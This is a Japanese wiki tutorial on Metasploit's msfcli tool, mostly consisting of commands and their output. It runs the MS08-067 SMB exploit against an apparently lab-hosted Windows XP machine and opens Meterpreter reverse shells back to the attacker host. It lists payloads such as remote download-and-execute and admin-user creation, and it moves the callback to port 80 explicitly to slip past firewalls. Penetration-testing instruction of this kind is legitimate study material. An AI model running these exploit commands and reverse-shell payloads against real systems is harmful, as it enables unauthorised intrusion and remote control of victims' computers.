最終更新:ID:8oMokgzXIg 2012年04月09日(月) 19:22:23履歴
MSFcliはコマンドラインからオプションを指定してペネトレーションテストを行うツールである。定型的なテストをスクリプトで行うといった用途に向いている。
オプションを完全に覚えていなくてもある程度インタラクティブに確認しながら実行することも可能。ただし起動する度に多少の時間がかかるためオプションなどがはっきりしない場合はMSFcolsoleを起動したほうがよい。
root@bt:~# msfcli -h Usage: /opt/metasploit/msf3/msfcli <exploit_name> <option=value> [mode] ======================================================================= Mode Description ---- ----------- (A)dvanced Show available advanced options for this module (AC)tions Show available actions for this auxiliary module (C)heck Run the check routine of the selected module (E)xecute Execute the selected module (H)elp You're looking at it baby! (I)DS Evasion Show available ids evasion options for this module (O)ptions Show available options for this module (P)ayloads Show available payloads for this module (S)ummary Show information about this module (T)argets Show available targets for this exploit module
試しにwindows/smb/ms08_067_netapiを使用することとする。Executeを行うにはmodeにEを設定して実行する。
root@bt:~# msfcli windows/smb/ms08_067_netapi E [*] Please wait while we load the module tree... [-] Exploit failed: The following options failed to validate: RHOST. [*] Exploit completed, but no session was created.
むむ。オプションが足りないらしい。オプションに何が必要なのかを調べてみる。
root@bt:~# msfcli windows/smb/ms08_067_netapi O [*] Please wait while we load the module tree... Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
RHOSTは必須のパラメータでデフォルトでは値が設定されていないようだ。RHOSTを設定して再度実行してみる。
root@bt:~# msfcli windows/smb/ms08_067_netapi RHOST=172.16.104.156 E [*] Please wait while we load the module tree... RHOST => 172.16.104.156 [*] Started reverse handler on 172.16.104.151:4444 [*] Automatically detecting the target... [*] Fingerprint: Windows XP - Service Pack 2 - lang:Japanese [*] Selected Target: Windows XP SP2 Japanese (NX) [*] Attempting to trigger the vulnerability... [*] Sending stage (752128 bytes) to 172.16.104.156 [*] Meterpreter session 1 opened (172.16.104.151:4444 -> 172.16.104.156:1062) at 2012-04-05 21:50:10 -0400 meterpreter > shell Process 1800 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>ipconfig ipconfig Windows IP Configuration Ethernet adapter ���[�J�� �G���A�ڑ� 2: Connection-specific DNS Suffix . : localdomain IP Address. . . . . . . . . . . . : 172.16.104.156 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 172.16.104.2 Ethernet adapter Bluetooth �l�b�g�[�N�ڑ�: Media State . . . . . . . . . . . : Media disconnected C:\WINDOWS\system32>netstat -a netstat -a Active Connections Proto Local Address Foreign Address State TCP nososhik-78vdlt:epmap nososhik-78vdlt:0 LISTENING TCP nososhik-78vdlt:microsoft-ds nososhik-78vdlt:0 LISTENING TCP nososhik-78vdlt:1025 nososhik-78vdlt:0 LISTENING TCP nososhik-78vdlt:netbios-ssn nososhik-78vdlt:0 LISTENING TCP nososhik-78vdlt:1064 172.16.104.151:4444 ESTABLISHED UDP nososhik-78vdlt:microsoft-ds *:* UDP nososhik-78vdlt:isakmp *:* UDP nososhik-78vdlt:1032 *:* UDP nososhik-78vdlt:4500 *:* UDP nososhik-78vdlt:ntp *:* UDP nososhik-78vdlt:1900 *:* UDP nososhik-78vdlt:ntp *:* UDP nososhik-78vdlt:netbios-ns *:* UDP nososhik-78vdlt:netbios-dgm *:* UDP nososhik-78vdlt:1900 *:*
無事にリモートのシェルが取得できた。
しかしローカルポートが4444にし、リモートポートも1064なっている。これは普通ファイアウォールに止められちゃうのでリモートからローカルの80に接続してくるように変更する。
使えるペイロードには何があるか調べてみる。
root@bt:~# msfcli windows/smb/ms08_067_netapi RHOST=172.16.104.156 P [*] Please wait while we load the module tree... Compatible payloads =================== Name Description ---- ----------- generic/custom Use custom string or file as payload. Set either PAYLOADFILE or PAYLOADSTR. generic/debug_trap Generate a debug trap in the target process generic/shell_bind_tcp Listen for a connection and spawn a command shell generic/shell_reverse_tcp Connect back to attacker and spawn a command shell generic/tight_loop Generate a tight loop in the target process windows/adduser Create a new user and add them to local administration group windows/dllinject/bind_ipv6_tcp Listen for a connection over IPv6, Inject a Dll via a reflective loader windows/dllinject/bind_nonx_tcp Listen for a connection (No NX), Inject a Dll via a reflective loader windows/dllinject/bind_tcp Listen for a connection, Inject a Dll via a reflective loader windows/dllinject/reverse_http Tunnel communication over HTTP, Inject a Dll via a reflective loader windows/dllinject/reverse_ipv6_http Tunnel communication over HTTP and IPv6, Inject a Dll via a reflective loader windows/dllinject/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject a Dll via a reflective loader windows/dllinject/reverse_nonx_tcp Connect back to the attacker (No NX), Inject a Dll via a reflective loader windows/dllinject/reverse_ord_tcp Connect back to the attacker, Inject a Dll via a reflective loader windows/dllinject/reverse_tcp Connect back to the attacker, Inject a Dll via a reflective loader windows/dllinject/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a Dll via a reflective loader windows/dllinject/reverse_tcp_dns Connect back to the attacker, Inject a Dll via a reflective loader windows/download_exec Download an EXE from an HTTP URL and execute it windows/exec Execute an arbitrary command windows/loadlibrary Load an arbitrary library path windows/messagebox Spawns a dialog via MessageBox using a customizable title, text & icon windows/meterpreter/bind_ipv6_tcp Listen for a connection over IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/meterpreter/bind_nonx_tcp Listen for a connection (No NX), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/meterpreter/bind_tcp Listen for a connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/meterpreter/reverse_http Tunnel communication over HTTP, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/meterpreter/reverse_https Tunnel communication over HTTP using SSL, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/meterpreter/reverse_ipv6_http Tunnel communication over HTTP and IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/meterpreter/reverse_ipv6_https Tunnel communication over HTTP using SSL and IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/meterpreter/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/meterpreter/reverse_nonx_tcp Connect back to the attacker (No NX), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/meterpreter/reverse_ord_tcp Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/meterpreter/reverse_tcp Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/meterpreter/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/meterpreter/reverse_tcp_dns Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service windows/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service windows/patchupdllinject/bind_ipv6_tcp Listen for a connection over IPv6, Inject a custom DLL into the exploited process windows/patchupdllinject/bind_nonx_tcp Listen for a connection (No NX), Inject a custom DLL into the exploited process windows/patchupdllinject/bind_tcp Listen for a connection, Inject a custom DLL into the exploited process windows/patchupdllinject/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject a custom DLL into the exploited process windows/patchupdllinject/reverse_nonx_tcp Connect back to the attacker (No NX), Inject a custom DLL into the exploited process windows/patchupdllinject/reverse_ord_tcp Connect back to the attacker, Inject a custom DLL into the exploited process windows/patchupdllinject/reverse_tcp Connect back to the attacker, Inject a custom DLL into the exploited process windows/patchupdllinject/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a custom DLL into the exploited process windows/patchupdllinject/reverse_tcp_dns Connect back to the attacker, Inject a custom DLL into the exploited process windows/patchupmeterpreter/bind_ipv6_tcp Listen for a connection over IPv6, Inject the meterpreter server DLL (staged) windows/patchupmeterpreter/bind_nonx_tcp Listen for a connection (No NX), Inject the meterpreter server DLL (staged) windows/patchupmeterpreter/bind_tcp Listen for a connection, Inject the meterpreter server DLL (staged) windows/patchupmeterpreter/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject the meterpreter server DLL (staged) windows/patchupmeterpreter/reverse_nonx_tcp Connect back to the attacker (No NX), Inject the meterpreter server DLL (staged) windows/patchupmeterpreter/reverse_ord_tcp Connect back to the attacker, Inject the meterpreter server DLL (staged) windows/patchupmeterpreter/reverse_tcp Connect back to the attacker, Inject the meterpreter server DLL (staged) windows/patchupmeterpreter/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL (staged) windows/patchupmeterpreter/reverse_tcp_dns Connect back to the attacker, Inject the meterpreter server DLL (staged) windows/shell/bind_ipv6_tcp Listen for a connection over IPv6, Spawn a piped command shell (staged) windows/shell/bind_nonx_tcp Listen for a connection (No NX), Spawn a piped command shell (staged) windows/shell/bind_tcp Listen for a connection, Spawn a piped command shell (staged) windows/shell/reverse_http Tunnel communication over HTTP, Spawn a piped command shell (staged) windows/shell/reverse_ipv6_http Tunnel communication over HTTP and IPv6, Spawn a piped command shell (staged) windows/shell/reverse_ipv6_tcp Connect back to the attacker over IPv6, Spawn a piped command shell (staged) windows/shell/reverse_nonx_tcp Connect back to the attacker (No NX), Spawn a piped command shell (staged) windows/shell/reverse_ord_tcp Connect back to the attacker, Spawn a piped command shell (staged) windows/shell/reverse_tcp Connect back to the attacker, Spawn a piped command shell (staged) windows/shell/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Spawn a piped command shell (staged) windows/shell/reverse_tcp_dns Connect back to the attacker, Spawn a piped command shell (staged) windows/shell_bind_tcp Listen for a connection and spawn a command shell windows/shell_reverse_tcp Connect back to attacker and spawn a command shell windows/speak_pwned Causes the target to say "You Got Pwned" via the Windows Speech API windows/upexec/bind_ipv6_tcp Listen for a connection over IPv6, Uploads an executable and runs it (staged) windows/upexec/bind_nonx_tcp Listen for a connection (No NX), Uploads an executable and runs it (staged) windows/upexec/bind_tcp Listen for a connection, Uploads an executable and runs it (staged) windows/upexec/reverse_http Tunnel communication over HTTP, Uploads an executable and runs it (staged) windows/upexec/reverse_ipv6_http Tunnel communication over HTTP and IPv6, Uploads an executable and runs it (staged) windows/upexec/reverse_ipv6_tcp Connect back to the attacker over IPv6, Uploads an executable and runs it (staged) windows/upexec/reverse_nonx_tcp Connect back to the attacker (No NX), Uploads an executable and runs it (staged) windows/upexec/reverse_ord_tcp Connect back to the attacker, Uploads an executable and runs it (staged) windows/upexec/reverse_tcp Connect back to the attacker, Uploads an executable and runs it (staged) windows/upexec/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Uploads an executable and runs it (staged) windows/upexec/reverse_tcp_dns Connect back to the attacker, Uploads an executable and runs it (staged) windows/vncinject/bind_ipv6_tcp Listen for a connection over IPv6, Inject a VNC Dll via a reflective loader (staged) windows/vncinject/bind_nonx_tcp Listen for a connection (No NX), Inject a VNC Dll via a reflective loader (staged) windows/vncinject/bind_tcp Listen for a connection, Inject a VNC Dll via a reflective loader (staged) windows/vncinject/reverse_http Tunnel communication over HTTP, Inject a VNC Dll via a reflective loader (staged) windows/vncinject/reverse_ipv6_http Tunnel communication over HTTP and IPv6, Inject a VNC Dll via a reflective loader (staged) windows/vncinject/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject a VNC Dll via a reflective loader (staged) windows/vncinject/reverse_nonx_tcp Connect back to the attacker (No NX), Inject a VNC Dll via a reflective loader (staged) windows/vncinject/reverse_ord_tcp Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged) windows/vncinject/reverse_tcp Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged) windows/vncinject/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a VNC Dll via a reflective loader (staged) windows/vncinject/reverse_tcp_dns Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)
PAYLOADを指定して実行する。
root@bt:~# msfcli windows/smb/ms08_067_netapi RHOST=172.16.104.156 PAYLOAD=windows/meterpreter/reverse_tcp E [*] Please wait while we load the module tree... RHOST => 172.16.104.156 PAYLOAD => windows/meterpreter/reverse_tcp [-] Exploit failed: The following options failed to validate: LHOST. [*] Exploit completed, but no session was created.
LHOSTの指定がいるようだ。もう一度オプションを確認してみる。
root@bt:~# msfcli windows/smb/ms08_067_netapi RHOST=172.16.104.156 PAYLOAD=windows/meterpreter/reverse_tcp O [*] Please wait while we load the module tree... Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 172.16.104.156 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST yes The listen address LPORT 4444 yes The listen port
ああ、ここでLPORTが4444になってるのか。じゃあ、LHOSTとLPORTを指定して実行してみる。
root@bt:~# msfcli windows/smb/ms08_067_netapi RHOST=172.16.104.156 PAYLOAD=windows/meterpreter/reverse_tcp LHOST=172.16.104.151 LPORT=80 E [*] Please wait while we load the module tree... RHOST => 172.16.104.156 PAYLOAD => windows/meterpreter/reverse_tcp LHOST => 172.16.104.151 LPORT => 80 [*] Started reverse handler on 172.16.104.151:80 [*] Automatically detecting the target... [*] Fingerprint: Windows XP - Service Pack 2 - lang:Japanese [*] Selected Target: Windows XP SP2 Japanese (NX) [*] Attempting to trigger the vulnerability... [*] Sending stage (752128 bytes) to 172.16.104.156 [*] Meterpreter session 1 opened (172.16.104.151:80 -> 172.16.104.156:1031) at 2012-04-05 22:07:19 -0400 meterpreter > shell Process 4024 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>netstat -an netstat -an Active Connections Proto Local Address Foreign Address State TCP 0.0.0.0:135 0.0.0.0:0 LISTENING TCP 0.0.0.0:445 0.0.0.0:0 LISTENING TCP 127.0.0.1:1025 0.0.0.0:0 LISTENING TCP 172.16.104.156:139 0.0.0.0:0 LISTENING TCP 172.16.104.156:1030 172.16.104.155:139 TIME_WAIT TCP 172.16.104.156:1031 172.16.104.151:80 ESTABLISHED UDP 0.0.0.0:445 *:* UDP 0.0.0.0:500 *:* UDP 0.0.0.0:1032 *:* UDP 0.0.0.0:4500 *:* UDP 127.0.0.1:123 *:* UDP 127.0.0.1:1900 *:* UDP 172.16.104.156:123 *:* UDP 172.16.104.156:137 *:* UDP 172.16.104.156:138 *:* UDP 172.16.104.156:1900 *:* C:\WINDOWS\system32>
うまくいった。
最新コメント